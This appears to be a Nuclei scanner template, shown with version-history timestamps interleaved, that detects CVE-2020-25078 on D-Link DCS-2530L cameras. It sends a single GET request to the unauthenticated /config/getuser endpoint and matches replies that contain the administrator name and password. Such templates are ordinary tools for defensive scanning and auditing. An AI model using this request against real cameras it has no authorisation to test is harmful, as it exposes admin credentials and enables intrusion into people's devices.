2021-04-01 03:35:06 +00:00
|
|
|
id: CVE-2020-25078
|
|
|
|
|
|
|
|
info:
|
2021-04-01 03:49:46 +00:00
|
|
|
name: D-Link DCS-2530L Administrator password disclosure
|
2021-04-01 03:35:06 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
|
|
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078
|
|
|
|
tags: cve,cve2020,d-link,disclosure
|
|
|
|
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/config/getuser?index=0"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "name="
|
|
|
|
- "pass="
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|